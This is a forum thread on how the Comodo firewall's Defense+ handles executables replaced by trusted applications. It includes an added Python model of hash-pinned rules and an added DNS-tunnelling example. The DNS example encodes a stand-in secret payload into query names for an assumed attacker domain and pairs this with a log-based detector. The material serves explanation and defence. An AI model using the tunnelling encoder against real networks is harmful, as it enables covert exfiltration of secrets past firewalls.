Replaced .exe automatically gets the same rights as the previous .exe in paranoid mode

The example is: replace hwmonitor.exe (from www.cpuid.com) using winrar (trusted app).
The defense+ part is set to paranoid, not in installation mode.

I replace hwmonitor.exe v1.10 (trusted app) with hwmonitor.exe v1.11 (unknown app), no warning, that is correct since winrar and explorer.exe are trusted apps.

Now I start hwmonitor v1.11, but I get no warning, I get no question whether that app is trusted etc, although the app changed!

The supposed behavior (as I got used to from Kerio/Sunbelt firewall, which is simply too unstable on a quad core):
“The application got replaced, use rules from the previous version yes/no?” and if I choose no, Comodo should then treat the app like it is unknown and ask the typical questions.

From my point of view this is a security risk, especially since I am always running in paranoid mode.

If this is a “by design” thing it should be changed. If it is a config thing, tell me what I have to change to get that behavior of asking whether a replaced app is accepted or not; it should ask upon start of that application, not during the replacing action.

regards,

Joachim

That is because hwmonitor v1.11 is a stand-alone application and is not installed, so I think, since it is portable and has no ties to the system registry, that it can’t actively be monitored. MODS, if I’m wrong feel free to jump in here.

That it is not “installed” is right, the file was replaced in paranoid mode.
Comodo does not seem to detect that the file got replaced; it only seems to store the path and name of the executable, not a CRC, not even the file size or last-modified time. I know that Kerio/Sunbelt stores CRC values.

Not recognizing a replaced .exe file as a different one from the original is a BIG minus on the security side; it leaves the door wide open for .exe files to be hacked after I set the “trusted app” bit. Everything else in that firewall is better than with Kerio/Sunbelt.

The only way such replaced executables should be automatically allowed is when they got replaced while in installation mode (i.e. Comodo firewall should update the CRC value of replaced .exe files during installation mode).

Set

I just downloaded hwmonitor, and Defense+ is warning me that hwmonitor.exe is trying to access the Service Control Manager, a protected COM interface, svchost.exe in memory, and the screen… so if it doesn’t ask, it should be because it is not detecting that there was a version change…

Now, while it seems a risky feature (or undesired bug?), we must remember Defense+ probably would have blocked an attempt to tamper with the original file… the file is not the same because the user changed it, using trusted apps.

Maybe it is a different focus… other security programs allow the malware to change our files, and then they say “hey, the file is not the same… do you want to allow…?”, and Defense+ seems to focus on preventing the files from being changed, making it unnecessary to check the file version. However, maybe it would be safer to do both things, just in case… and after all, Paranoid mode should be… paranoid.

Agree, that is a threat.
V3 does not have hash functions to monitor the change.

You missed the point: hwmonitor.exe v1.10 is listed as “trusted application”; it needs a lot of rights to read the temperatures, voltages etc. out of the system, and/or directly from the chips on board.

The point is: I copy version 1.11 over version 1.10, and Comodo doesn’t notice that it is a different application; it trusts v1.11 just like it trusted v1.10, without asking. And: I am in Paranoid mode, not Install mode!

Kerio asks “File got replaced, accept new file?”, and it asks that for every copy of hwmonitor.exe on my system separately (like the one in %PROGRAMDIR%, the one on D:, the one on my network drive, etc.).

I know that very precisely since I used Kerio/Sunbelt for many years; I have been using Comodo for about 3 weeks now.
Please, this is a serious security issue, to not notice a changed app.

Set

My point is hwmonitor is not being automatically recognised… remember CFP is supposed to check apps against a database of known apps…

Checked against a database of known safe apps! (R)

If you are running in Paranoid Mode like I am, you do not get changed-file alerts like Kerio.
I did run Kerio since 2.4 and changed to CPF3 over a year ago because of Vista; Kerio still runs on my partner’s computer, so I know the alerts are not the same on CPF3.
Example: for an antivirus where you have set all alerts to “remember” for normal virus updates, when you receive a major program update you will receive new alerts for folders, registry etc., unless you have given permission to allow the app to change all folders/registry entries.
Dennis
EDIT: Reading your first post again, you have set winrar as a Trusted App; you will not get any alerts, or very few, for Trusted Apps.
If you want more alerts: when you first install CPF3, set it to Paranoid mode, delete all entries apart from Comodo’s, change Explorer to ask for all (this is one of the auto entries you get in Paranoid Mode) and do not set anything as Trusted.
You will get plenty of alerts and it is very easy to lock up your computer, so have fun ;D
Or, for limited alerts, which most people want: use preset rules, run in Training mode for a very short period and then set to Safe Mode for both, and set the apps you are sure about to Trusted.

Old-generation firewalls didn’t have a full-featured HIPS and thus it was not possible to monitor file integrity in real time.
For this reason, when a firewall rule was created that rule was bound to a file hash signature.

When that app attempted a connection, the old firewall checked if the file had been changed in the meantime by comparing the hash signature of the launched app with the one previously stored.

If those signatures did not match, the old firewall triggered an alert.

V3 is different since D+ alerts every time a protected file (e.g. all executables) is written (or moved).
Those alerts, which you get the same moment those files are created/moved, are meant to supersede the old hash checks.

Since explorer.exe is a Trusted application and CFP V3 protects you from any indirect tampering with explorer.exe, you’ll not get those protected-file alerts.

So for example, if you have firefox.exe and you previously created a policy to allow it to connect to the internet,
if you rename leaktest.exe to firefox.exe and replace the real firefox.exe with it, you won’t get any alert and the renamed leaktest.exe will be allowed to connect to the internet.
The same thing happens for HIPS policies.

This will happen because you used explorer.exe, which is a Trusted application.
If any other untrusted app attempts to move/copy/create a file you’ll get an alert.
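
The two designs described in this thread, the old hash-bound rule (Kerio/Sunbelt, as Joachim describes it above) and the write-time protected-file alert that Defense+ uses instead, can be modelled side by side. The following is an added example written for this page; it is not Comodo’s, Kerio’s or any other vendor’s code. It pins each allow rule to the SHA-256 of the executable and re-checks it at launch, lets a “trusted writer” replace the file without a write-time alert (the explorer.exe case), and only refreshes the pinned hash when an assumed “installation mode” flag is set. The file names, the `explorer.exe`/`leaktest.exe` writer labels, and the policy store itself are constructed for the demo; real Defense+ has no such API.

```python
"""Added example: launch-time hash pinning beside write-time protected-file
alerts. Constructed model, not Comodo/Kerio code."""
import hashlib
import os
import shutil
import tempfile
from dataclasses import dataclass, field


@dataclass
class Rule:
    allow: bool
    sha256: str  # hash of the binary the rule was created for (Kerio-style CRC)


@dataclass
class PolicyStore:
    rules: dict = field(default_factory=dict)           # path -> Rule
    trusted_writers: set = field(default_factory=set)   # apps allowed to write executables
    install_mode: bool = False                          # assumed "installation mode" flag
    alerts: list = field(default_factory=list)


def file_hash(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def add_rule(store, path, allow):
    """Bind the rule to the hash of the binary as it is right now."""
    store.rules[path] = Rule(allow, file_hash(path))


def write_executable(store, writer, path, data):
    """Model of the D+ protected-file check: an untrusted writer raises an
    alert (denied here); a trusted writer gets through silently. Only in
    installation mode is the pinned hash refreshed, otherwise it stays bound
    to the old binary (the "limited trust" behaviour asked for in the thread)."""
    if writer not in store.trusted_writers:
        store.alerts.append(f"{writer} tried to write protected file {path}")
        return False
    with open(path, "wb") as f:
        f.write(data)
    if store.install_mode and path in store.rules:
        store.rules[path].sha256 = file_hash(path)
    return True


def launch(store, path):
    """Old-firewall style check at launch: no rule -> ask the user; rule but
    hash mismatch -> "file got replaced, accept new version?"; match -> apply."""
    rule = store.rules.get(path)
    if rule is None:
        return "ask"
    if file_hash(path) != rule.sha256:
        store.alerts.append(f"{path} replaced since rule creation")
        return "replaced"
    return "allow" if rule.allow else "deny"


def demo():
    """Replay the firefox.exe / leaktest.exe scenario from the thread."""
    d = tempfile.mkdtemp()
    try:
        firefox = os.path.join(d, "firefox.exe")
        store = PolicyStore(trusted_writers={"explorer.exe"})
        with open(firefox, "wb") as f:
            f.write(b"real firefox binary (constructed)")
        add_rule(store, firefox, allow=True)
        results = {"clean_launch": launch(store, firefox)}
        # leaktest.exe (untrusted) tries to overwrite firefox.exe: write-time alert.
        results["untrusted_write"] = write_executable(store, "leaktest.exe", firefox, b"leaktest")
        # explorer.exe (trusted) copies leaktest.exe over firefox.exe: no alert...
        results["trusted_write"] = write_executable(store, "explorer.exe", firefox, b"leaktest")
        # ...but the launch-time hash check still catches the swap.
        results["launch_after_replace"] = launch(store, firefox)
        # The same replacement done in installation mode refreshes the pinned hash.
        store.install_mode = True
        write_executable(store, "explorer.exe", firefox, b"firefox update (constructed)")
        store.install_mode = False
        results["launch_after_install"] = launch(store, firefox)
        results["alerts"] = list(store.alerts)
        return results
    finally:
        shutil.rmtree(d, ignore_errors=True)


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Doing both checks costs one hash per launch, which is cheap next to the HIPS work already being done; the price is the extra prompt after every legitimate update outside installation mode, which is exactly the prompt the paranoid user in this thread wants.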

Thank you for exactly answering what I asked!
Now that I know the design behind this I feel a lot safer again, and it makes a lot of sense that trusted app is defined that way. This also means: I have to go through the predefined policies of Defense+ again to see more exactly which does what.

This leaves only one Question:
The “Installation mode” is not listed as one of the predefined policies; what are the exact settings for Installation mode? I guess it replaces .exe files just like the normal trusted app, and so on.
A link to “Read this page” would be enough since I bet I am not the first one asking that.

One feature I would like to see: when a new app comes up (especially when selecting “treat as installer/updater”), is it possible to set a time-based rule instead of just selecting “remember my choice”? Like: apply this rule for the app for 1 hour/10 hours, and then delete the app entry in the database once the time has passed. It would spare me from cleaning the database manually from time to time of those usually then useless installer entries.

Set

Installation mode is to be used with the installer/updater policy. It should be activated only to install Trusted applications, and it will suppress every alert.

Ref: http://wiki.comodo.com/CFP3/Help_Guide/Defense_Task_Center/Defense_Settings#.27General_Settings.27_tab

If you don’t enable “Remember my choice” the rule/policy will be active until that app is terminated.

This means that if you allow something for explorer.exe you should terminate it manually (using Task Manager) or wait until the next reboot.
If you apply a rule to a leaktest without marking it to be remembered, you’ll be asked again next time you start that leaktest.

I checked and searched for the following:
Giving an application rights just like a trusted application, but STILL being asked upon start of a replaced program.
I searched for a setting that allows open-create and open-modify of .exe, .com etc., but does NOT update the stored hash of the modified programs.

It is like limited trust: what happens if the “trusted” program wreaks havoc (i.e. due to a plugin in the trusted program which behaves like a virus), modifies tons of programs, and I don’t notice?
This in-between kind of policy is missing.
A lot of programs need “trusted” rights, like file managers or Adobe updaters, which cannot copy a .exe file when they are not trusted. But it should not update the hash of the copied programs yet; it should ask separately after replacement and upon start of the replaced program.

Or, to say it another way: either I set “trusted program” or “Installer” and it can modify anything it wants in the whole system (and not only what I want) without control, due to auto-updated hashes, or the program is not trusted and I cannot even use a file manager.

The “trusted program” and “Install mode” the way they are now are perfect for Windows updates, Windows Service Packs, virus scanners and other system-near stuff. For all other things the “limited trust” with still asking after replacing a .exe file is what paranoid mode should be, maybe even what “safe mode” should be. I want to control what they replace, and I cannot right now; for me I would impose “limited trust” even on explorer.exe or my winrar.exe example, to ask me “File replaced, accept new version?” AFTER I copied it.

So, now that I have said basically the same thing four times just in different words in one post, please help!

How can I set such a policy? Currently it seems impossible “by design”.

Set

PS: Yes, yes, I am a control freak and paranoid, the better you know computers, the more you get that way.

PS2: Your wiki on http://wiki.comodo.com/CFP3/Help_Guide/Defense_Task_Center/Defense_Settings#.27General_Settings.27_tab says that DNS recursion can be used as an attack vector. It can also be used as a VPN, although this is kind of sick. There are test implementations which are fully functional and create a full tunnel (not necessarily encrypted) by only using DNS requests, without having any gateway configured on the machines using that sick tunnel. Since DNS is required for Active Directory, usually the AD server acting as DNS server also forwards DNS to an external server for unknown domains (else nobody could surf or get Windows updates), so this attack vector is normally open.
See http://www.heise.de/ct/inhverz/suche?q=dns+tunnel&search_submit=Suchen&rm=search (sorry, German magazine, and the online version of that article costs money; I still have that issue on paper here).
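
To make the DNS-tunnel remark in the PS above concrete, here is an added example (not from the thread, the Comodo wiki or the cited c’t article) of how data rides in the query names that a forwarding resolver passes upstream, together with a small detector a defender can run over resolver logs. The zone `tunnel.example` is an assumed attacker-controlled domain, the “normal” log lines are constructed, and the exfiltrated payload is a constructed stand-in (SHA-256 outputs) for a dump of secrets; the thresholds in `suspicious_domains` are assumptions to tune against your own traffic.

```python
"""Added example: encoding data into DNS query names and flagging such
traffic in resolver logs. Constructed demo, not from the original thread."""
import base64
import hashlib
import math
from collections import Counter, defaultdict

TUNNEL_DOMAIN = "tunnel.example"  # assumed attacker-controlled zone
MAX_LABEL = 63                    # RFC 1035 label length limit

# Constructed payload: a few SHA-256 digests stand in for a dump of secrets.
PAYLOAD = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(7))


def encode_queries(payload, domain=TUNNEL_DOMAIN):
    """Split the payload into base32 labels; each query name carries one
    chunk plus a sequence number so the authoritative server can reorder."""
    text = base64.b32encode(payload).decode().rstrip("=").lower()
    return [f"{i}.{text[j:j + MAX_LABEL]}.{domain}"
            for i, j in enumerate(range(0, len(text), MAX_LABEL))]


def decode_queries(names):
    """What the attacker's authoritative server does with the received names."""
    chunks = []
    for name in names:
        seq, data, _domain = name.split(".", 2)
        chunks.append((int(seq), data))
    text = "".join(data for _, data in sorted(chunks)).upper()
    text += "=" * (-len(text) % 8)  # restore base32 padding
    return base64.b32decode(text)


def shannon_entropy(s):
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def suspicious_domains(log_lines, min_queries=5, min_len=30, min_entropy=3.0):
    """Group queries by registered domain (last two labels; good enough for
    the demo) and flag domains with many long, high-entropy subdomains.
    Thresholds are assumptions, not measured values."""
    by_domain = defaultdict(list)
    for line in log_lines:
        qname = line.split()[-1].rstrip(".")
        labels = qname.split(".")
        if len(labels) < 3:
            continue
        by_domain[".".join(labels[-2:])].append(".".join(labels[:-2]))
    flagged = {}
    for domain, subs in by_domain.items():
        if len(set(subs)) < min_queries:
            continue
        avg_len = sum(len(s) for s in subs) / len(subs)
        entropy = sum(shannon_entropy(s) for s in subs) / len(subs)
        if avg_len >= min_len and entropy >= min_entropy:
            flagged[domain] = {"queries": len(subs),
                               "avg_len": round(avg_len, 1),
                               "entropy": round(entropy, 2)}
    return flagged


def demo():
    queries = encode_queries(PAYLOAD)
    # Constructed resolver log: ordinary lookups plus the tunnel traffic.
    log = [
        "10:00:01 192.0.2.10 www.microsoft.com",
        "10:00:02 192.0.2.10 update.microsoft.com",
        "10:00:03 192.0.2.11 www.cpuid.com",
        "10:00:04 192.0.2.11 download.cpuid.com",
        "10:00:05 192.0.2.12 forums.comodo.com",
        "10:00:06 192.0.2.12 wiki.comodo.com",
    ] + [f"10:00:{7 + i:02d} 192.0.2.13 {q}" for i, q in enumerate(queries)]
    return {
        "query_count": len(queries),
        "roundtrip": decode_queries(queries) == PAYLOAD,
        "flagged": suspicious_domains(log),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The encoder only needs the client to be able to resolve names, which is why a forwarding AD/DNS server leaves the vector open even when no gateway is configured; the detector is deliberately simple (unique-subdomain count, average label length, entropy) so it can be scaled up to real query logs and tuned per domain.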